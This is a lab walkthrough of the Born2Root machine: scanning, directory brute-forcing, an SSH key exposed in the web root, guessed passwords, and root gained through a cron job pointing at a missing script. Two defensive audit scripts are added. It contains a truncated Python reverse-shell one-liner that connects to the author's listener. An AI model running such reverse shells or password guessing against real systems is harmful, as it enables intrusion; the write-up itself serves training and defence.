BORN2ROOT — Offensive Security
Offensive Security Proving Ground Complete Write-up
I exported the IP of the target machine as an environment variable, scanned the target, and found the following open ports and services:
After moving on to port 80, I found three usernames: martin, hadi and jimmy. COOL!!
After brute-forcing directories with wfuzz, the results were:
After hopping into the icons directory and enumerating all the files there, I found a file containing an SSH key.
AWESOME!! So we have three users; after trying martin with the password secret lab, the login succeeded.
Enumerating martin's machine, I found in the crontab that the file sekurity.py runs every five minutes, but the file itself is missing from /tmp.
So I created a file with the same name containing a reverse shell payload:
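The key was sitting in a directory that is part of the web root but that nobody routinely looks at. The following audit script is an added example (not part of the original write-up and not the target's code) showing how a defender would sweep a document root for private-key material: it flags conventional key file names and, independently of the name, any file whose content starts with a PEM or OpenSSH private-key header. The web root it scans is constructed in a temporary directory so the example runs offline.

```python
"""Sweep a web document root for exposed SSH/TLS private keys (added example)."""
import os
import shutil
import tempfile

# Content markers for private-key material; checked by content so that a key
# renamed to something innocuous (notes.txt, logo.png) is still caught.
PRIVATE_KEY_MARKERS = (
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
    b"-----BEGIN ENCRYPTED PRIVATE KEY-----",
)

# Conventional private-key file names, flagged even if the file is unreadable.
SUSPICIOUS_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519"}

REASON_NAME = "suspicious file name"
REASON_CONTENT = "private-key header in content"


def scan_webroot(root, max_bytes=4096):
    """Return a sorted list of (path relative to root, reason) for exposed keys."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name in SUSPICIOUS_NAMES:
                findings.append((rel, REASON_NAME))
                continue
            try:
                with open(full, "rb") as fh:  # bytes, so binary files are safe to read
                    head = fh.read(max_bytes)
            except OSError:
                continue  # unreadable file: nothing we can say about its content
            if any(marker in head for marker in PRIVATE_KEY_MARKERS):
                findings.append((rel, REASON_CONTENT))
    return sorted(findings)


def build_sample_webroot():
    """Create a constructed web root (sample data, not from any real host) and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for sub in ("icons", "css", "backup"):
        os.makedirs(os.path.join(root, sub))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html><body>Welcome</body></html>\n")
    with open(os.path.join(root, "css", "style.css"), "w") as fh:
        fh.write("body { color: black; }\n")
    # Binary asset that must not be flagged.
    with open(os.path.join(root, "icons", "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 64)
    # Public key: harmless, must not be flagged.
    with open(os.path.join(root, "icons", "key.pub"), "w") as fh:
        fh.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ CONSTRUCTED user@host\n")
    # A private key with a misleading name, dropped into a rarely inspected directory.
    with open(os.path.join(root, "icons", "notes.txt"), "wb") as fh:
        fh.write(b"-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA CONSTRUCTED\n"
                 b"-----END RSA PRIVATE KEY-----\n")
    # A key with its conventional name left behind by a backup.
    with open(os.path.join(root, "backup", "id_ed25519"), "w") as fh:
        fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nCONSTRUCTED\n-----END OPENSSH PRIVATE KEY-----\n")
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    try:
        for rel, reason in scan_webroot(sample):
            print(f"{reason}: {rel}")
    finally:
        shutil.rmtree(sample)
```

Running it on the constructed root reports backup/id_ed25519 (by name) and icons/notes.txt (by content) while leaving the public key, the PNG and the HTML alone; pointing scan_webroot at a real document root is a quick pre-deployment check.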
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",0000));
with my listener running on my machine, and yes, it was good to go!
Enumerating the machine further, I found nothing special; the only user left was hadi, so I tried hadi with the guessable password hadi123, and guess what, it worked!!!!
Enumerating the machine, I switched user with the su command, tried the same password, and the login succeeded.
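The crontab entry above points at a script that did not exist in a directory every user can write to, which is exactly the condition a scheduled job should never have. The following script is an added example (not part of the original write-up and not the target's code) of how an administrator can audit crontab lines for that class of problem: it parses each entry, pulls out every absolute path in the command, and reports paths that are missing, that sit in a world-writable directory, or that are themselves world-writable. The crontab text and the files it references are constructed in a temporary directory so the example runs offline; the file name sekurity.py is taken from the write-up, everything else is made up.

```python
"""Audit crontab entries for scripts an unprivileged user could supply or modify (added example)."""
import os
import shlex
import stat
import tempfile

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week

R_MISSING = "missing"
R_MISSING_CREATABLE = "missing; anyone can create it in a world-writable directory"
R_WORLD_WRITABLE = "file is world-writable"
R_REPLACEABLE = "file can be replaced in a world-writable, non-sticky directory"


def parse_cron_line(line, system_crontab=False):
    """Split a crontab line into (schedule, user, command); None for comments, blanks and env lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    n_sched = 1 if line.startswith("@") else CRON_FIELDS  # @hourly etc. is one field
    n_user = 1 if system_crontab else 0  # /etc/crontab carries a user column
    parts = line.split(None, n_sched + n_user)
    if len(parts) < n_sched + n_user + 1:
        return None
    schedule = " ".join(parts[:n_sched])
    user = parts[n_sched] if system_crontab else None
    return schedule, user, parts[n_sched + n_user]


def extract_paths(command):
    """Return the absolute paths mentioned anywhere in a cron command string."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def audit_path(path):
    """Return the reasons why a path used by a scheduled job is risky (empty list if fine)."""
    parent = os.path.dirname(path) or "/"
    try:
        parent_mode = os.stat(parent).st_mode
    except OSError:
        parent_mode = 0
    parent_ww = bool(parent_mode & stat.S_IWOTH)
    parent_sticky = bool(parent_mode & stat.S_ISVTX)
    if not os.path.exists(path):
        # A missing file in a world-writable directory (sticky or not) can be created by anyone.
        return [R_MISSING_CREATABLE if parent_ww else R_MISSING]
    reasons = []
    if os.stat(path).st_mode & stat.S_IWOTH:
        reasons.append(R_WORLD_WRITABLE)
    if parent_ww and not parent_sticky:  # sticky bit stops others from replacing an existing file
        reasons.append(R_REPLACEABLE)
    return reasons


def audit_crontab(text, system_crontab=False):
    """Return (command, path, reasons) for every risky path referenced by the crontab text."""
    findings = []
    for raw in text.splitlines():
        parsed = parse_cron_line(raw, system_crontab)
        if parsed is None:
            continue
        _schedule, _user, command = parsed
        for path in extract_paths(command):
            reasons = audit_path(path)
            if reasons:
                findings.append((command, path, reasons))
    return findings


def build_sample_environment():
    """Construct sample directories, files and a crontab (not from any real host); return (root, crontab)."""
    root = tempfile.mkdtemp(prefix="cron_audit_")
    scratch = os.path.join(root, "scratch")  # plays the role of /tmp: world-writable with sticky bit
    os.makedirs(scratch)
    os.chmod(scratch, 0o1777)
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    os.chmod(bindir, 0o755)
    with open(os.path.join(bindir, "backup.sh"), "w") as fh:
        fh.write("#!/bin/sh\necho backup\n")
    os.chmod(os.path.join(bindir, "backup.sh"), 0o755)
    with open(os.path.join(bindir, "cleanup.py"), "w") as fh:
        fh.write("print('cleanup')\n")
    os.chmod(os.path.join(bindir, "cleanup.py"), 0o666)  # careless permissions
    crontab = (
        "# m h dom mon dow command\n"
        f"*/5 * * * * python3 {scratch}/sekurity.py\n"  # referenced script does not exist
        f"0 2 * * * {bindir}/backup.sh\n"
        f"@hourly python3 {bindir}/cleanup.py\n"
    )
    return root, crontab


if __name__ == "__main__":
    _root, sample_crontab = build_sample_environment()
    for command, path, reasons in audit_crontab(sample_crontab):
        print(f"{path}: {', '.join(reasons)}  [{command}]")
```

On the constructed input the audit reports sekurity.py as missing and creatable by anyone, and cleanup.py as world-writable, while backup.sh passes. To use it on a real host, feed it the output of crontab -l (per user) or the contents of /etc/crontab with system_crontab=True.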
Clearly we are now root!!!
That’s all for now!!
Until Next Time,
For any query, catch me on: